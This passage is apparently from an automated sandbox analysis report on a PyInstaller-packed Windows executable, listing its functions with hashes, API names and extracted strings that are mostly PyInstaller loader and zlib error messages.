                                                  • Opcode ID: 7d709474b1a4bf75fc575d481edd2e8fc45b698afa591cb20bc82c2b9fe51d91
                                                  • Instruction ID: 0ee84b1be6be4b7c00f6021233c0ac43268d26487e93129a811d9cb7dc441b97
                                                  • Opcode Fuzzy Hash: 7d709474b1a4bf75fc575d481edd2e8fc45b698afa591cb20bc82c2b9fe51d91
                                                  • Instruction Fuzzy Hash: F6D0C991E1984346FA78B7B368D59399291DFF9B50F844430D81D81671EE1C659542B0
                                                  Function 00007FF79EA482E0 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DirectoryErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 377330604-0
                                                  • Opcode ID: 71f1e042a03ee4b45df1047b1ddf8681d2a769f87646e79ab316bda138fac715
                                                  • Instruction ID: 82fb887219773ff840c83c7c82f376e0787dc8f2fd4ea5290aee36dee4ac55b9
                                                  • Opcode Fuzzy Hash: 71f1e042a03ee4b45df1047b1ddf8681d2a769f87646e79ab316bda138fac715
                                                  • Instruction Fuzzy Hash: 73417616D1C6C591E621AB34A5516BCA360FBA5784F959232EF8D42163FF28B6C8C330

                                                  Non-executed Functions

                                                  Function 00007FF79EA450D0 Relevance: 233.1, APIs: 44, Strings: 89, Instructions: 363libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: Failed to get address for PyConfig_Clear$Failed to get address for PyConfig_InitIsolatedConfig$Failed to get address for PyConfig_Read$Failed to get address for PyConfig_SetBytesString$Failed to get address for PyConfig_SetString$Failed to get address for PyConfig_SetWideStringList$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyPreConfig_InitIsolatedConfig$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PyStatus_Exception$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetObject$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_ExitStatusException$Failed to get address for Py_Finalize$Failed to get address for Py_InitializeFromConfig$Failed to get address for Py_IsInitialized$Failed to get address for Py_PreInitialize$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                  • API String ID: 190572456-4266016200
                                                  • Opcode ID: 14785d6e7bc2baf3401dc5b349dbbd6f73f8c7ddb60bebd002ee515bd7b7ae54
                                                  • Instruction ID: 7545ca3fbd3d9e9d0044cfe652b6e2c646e4a87ecad510b11e32ee6bf1e2fd0b
                                                  • Opcode Fuzzy Hash: 14785d6e7bc2baf3401dc5b349dbbd6f73f8c7ddb60bebd002ee515bd7b7ae54
                                                  • Instruction Fuzzy Hash: 6412B464A19F0395FE79EB25ACD0874A6A1EF46B44BC65431D80E063B4FF7CE9498330
                                                  Function 00007FF79EA41F50 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                  • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                  • API String ID: 2446303242-1601438679
                                                  • Opcode ID: 6259fad1ac732275e9b31943f0bc06070114494923621a8928dbeeeacfcbb0ed
                                                  • Instruction ID: 1d88dbe607d02b34136b973a87174a43e777f2a12b60fb21657ce4becfc8348a
                                                  • Opcode Fuzzy Hash: 6259fad1ac732275e9b31943f0bc06070114494923621a8928dbeeeacfcbb0ed
                                                  • Instruction Fuzzy Hash: CDA15136218B8187D7249F21E494BAEB770F789B84F904126DB8D43B24DF7DE165CB60
                                                  Function 00007FF79EA5F9FC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1209COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 808467561-2761157908
                                                  • Opcode ID: b4ac3ca9d165bd3345c25ccf605b050a00ed4afb5e75d50575a3e41fada79be9
                                                  • Instruction ID: bd3b419ff169b23e22d81d345b0e15a027ed60556c0cd3acce9732f1fe8d164d
                                                  • Opcode Fuzzy Hash: b4ac3ca9d165bd3345c25ccf605b050a00ed4afb5e75d50575a3e41fada79be9
                                                  • Instruction Fuzzy Hash: 40B21672A186828BE7759F34D4C0BFDB7A1FB55788F801135DA0D57AA8DF38A940CB60
                                                  Function 00007FF79EA48460 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA48487
                                                  • FormatMessageW.KERNEL32(00000000,00007FF79EA42A60), ref: 00007FF79EA484B6
                                                  • WideCharToMultiByte.KERNEL32 ref: 00007FF79EA4850C
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                  • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                  • API String ID: 2920928814-2573406579
                                                  • Opcode ID: 8a7c589bd815277da55e5032dbfaf14fad2e1b33d14a13ff34ff4e95c7544bc2
                                                  • Instruction ID: 2be9fe78b642ea5efa633c6bcaa93fd964e0134f57ab31533e386005c997c0d3
                                                  • Opcode Fuzzy Hash: 8a7c589bd815277da55e5032dbfaf14fad2e1b33d14a13ff34ff4e95c7544bc2
                                                  • Instruction Fuzzy Hash: 4E216031A18E42A6EB70AB31F8D0A76A265FB89794FC40035E64D826B5EF3CD145C730
                                                  Function 00007FF79EA4A338 Relevance: 12.0, Strings: 9, Instructions: 730COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                  • API String ID: 0-2665694366
                                                  • Opcode ID: c9fd51c14d71560020b511e4453ea2e6ada1d51fd66898c83da3cb6eb71852f9
                                                  • Instruction ID: e686b4a1bff259c99e7fb136f0f22e662af6937e24821a3fdd5b6db10366cc4b
                                                  • Opcode Fuzzy Hash: c9fd51c14d71560020b511e4453ea2e6ada1d51fd66898c83da3cb6eb71852f9
                                                  • Instruction Fuzzy Hash: F152C572A146A687D7A49F28D4C8E7E77ADEB84340F514139E649837D0FB3DD944CB20
                                                  Function 00007FF79EA4C4AC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: e2d8ec37f49102d448cf8ff6e1cc4a7b9f10d5f9e58c255e7ae627ab0bceba52
                                                  • Instruction ID: 6fb8c90c4bf9a76486a1ac03354a4e67dbd641bc4a95c5205ce0852309881353
                                                  • Opcode Fuzzy Hash: e2d8ec37f49102d448cf8ff6e1cc4a7b9f10d5f9e58c255e7ae627ab0bceba52
                                                  • Instruction Fuzzy Hash: CC313E72608A818AEB70AF70E8807FDA374FB84744F844439DA4E47AA5EF3CD548C724
                                                  Function 00007FF79EA5D354 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 3215553584-0
                                                  • Opcode ID: 494f7018f429e3a3156a3848e8a2f878a80914e655882d93d256a720425552d1
                                                  • Instruction ID: 1f6f711290f21647482cf92cc7940c4b9b18ba1ff2f9c683f258319ad608774c
                                                  • Opcode Fuzzy Hash: 494f7018f429e3a3156a3848e8a2f878a80914e655882d93d256a720425552d1
                                                  • Instruction Fuzzy Hash: EAA1B662B2869181EA70EB36A440ABFE3A0FB54BD4F904536DE5D47BA4DF3CE4458730
                                                  Function 00007FF79EA565B4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 1e147023b13237ffbc65418b8e432fc2e6dd89f910f01b87466ecf342e2d3767
                                                  • Instruction ID: 7af4d0f0aa0d8bd5ecf8d8b4279c0712f07bf755d75f1ad739eedfcd076b511a
                                                  • Opcode Fuzzy Hash: 1e147023b13237ffbc65418b8e432fc2e6dd89f910f01b87466ecf342e2d3767
                                                  • Instruction Fuzzy Hash: 24313032618F818ADB609F35E8806BEB3A4FB89754F940136EA8D43B65DF3CD555CB20
                                                  Function 00007FF79EA57C50 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite$ConsoleOutput
                                                  • String ID:
                                                  • API String ID: 1443284424-0
                                                  • Opcode ID: a870f68cda9430bfe6b15ba74579c72570b89eb0d9ddc512b88bb86eb6a5cd4d
                                                  • Instruction ID: ab7e605a46f303154699c840d1f19649605a342c667e96d550516c3f07169bb4
                                                  • Opcode Fuzzy Hash: a870f68cda9430bfe6b15ba74579c72570b89eb0d9ddc512b88bb86eb6a5cd4d
                                                  • Instruction Fuzzy Hash: 7DE1FF72A08B819AE721DB74D0805BDB7B1FB45798F914132EE4E57BA9DE38D806C720
                                                  Function 00007FF79EA61444 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 244COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                  • String ID: ?
                                                  • API String ID: 1286766494-1684325040
                                                  • Opcode ID: d4e410a16d487476c67d218b29ca1888644fd8d47f73a6752703e38714d72d13
                                                  • Instruction ID: 14fa8d8956e30b03cf1d1a156c9c7054106815ce597017553acc2c02147e2be6
                                                  • Opcode Fuzzy Hash: d4e410a16d487476c67d218b29ca1888644fd8d47f73a6752703e38714d72d13
                                                  • Instruction Fuzzy Hash: 96910766F0865285EB30BB35C480A7EAA61EBA1FD4F944135EA4D077E5DF3CD4828770
                                                  Function 00007FF79EA49B04 Relevance: 5.4, Strings: 4, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                                  • API String ID: 0-4074041902
                                                  • Opcode ID: be1d48212573e8220cad0fbc78fc00788ac171ee6cf0b3e8ac930acaa513398d
                                                  • Instruction ID: a1a7fc30e0b148b3ebf4be6f36f6e7a7e183d06bddaea3ba6a1e477d3fce3aae
                                                  • Opcode Fuzzy Hash: be1d48212573e8220cad0fbc78fc00788ac171ee6cf0b3e8ac930acaa513398d
                                                  • Instruction Fuzzy Hash: 57F1947260878A46E7B5AF2AD0C8E3ABBE9FF44744F454538DA4D077A4EB38D940C760
                                                  Function 00007FF79EA5F5D0 Relevance: 4.8, APIs: 3, Instructions: 317COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: memcpy_s
                                                  • String ID:
                                                  • API String ID: 1502251526-0
                                                  • Opcode ID: 61c8d48a73c74d7b2b5693099c23eccbf95a4682f3061de545b2f75f73c9d44c
                                                  • Instruction ID: 4b056ea595aeca5703dc7c13519091f71c1dcab73378629ba451f276c68a09d6
                                                  • Opcode Fuzzy Hash: 61c8d48a73c74d7b2b5693099c23eccbf95a4682f3061de545b2f75f73c9d44c
                                                  • Instruction Fuzzy Hash: 81C1C176B1868687DB34DF29A184A7EB792F794784F948139DB4A83754DF3CE800CB60
                                                  Function 00007FF79EA4996D Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: incorrect header check$invalid window size$unknown compression method
                                                  • API String ID: 0-1186847913
                                                  • Opcode ID: e5489ffdc9239a6bbb5b0a781e308ccd149b9401a2c220e20fc3d81844b516e9
                                                  • Instruction ID: d9091dbdf6a198385143406ee099c9b06cfa625b3cbc412f8d042c3585cd63a3
                                                  • Opcode Fuzzy Hash: e5489ffdc9239a6bbb5b0a781e308ccd149b9401a2c220e20fc3d81844b516e9
                                                  • Instruction Fuzzy Hash: 5691D872A182864BE7B5AF25D4C8E3E76EDFB44344F514139DA4A467A0FB38E941CB20
                                                  Function 00007FF79EA4A02C Relevance: 3.9, Strings: 3, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $ $invalid block type
                                                  • API String ID: 0-2056396358
                                                  • Opcode ID: 296c666076ee56b4f777f48a39b6fce6e00ed4a59ca727a8199edae2b727a8e6
                                                  • Instruction ID: 9724823d64b8aee7e4c854f436030f07f28a5d0f15d70a5f64877d458e74da74
                                                  • Opcode Fuzzy Hash: 296c666076ee56b4f777f48a39b6fce6e00ed4a59ca727a8199edae2b727a8e6
                                                  • Instruction Fuzzy Hash: 5261B7B390879A4AE7B1AF29D8CCA3A7AACFB40354F514135D658827E0FB39D545CB20
                                                  Function 00007FF79EA5994C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 251COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmpDownload File
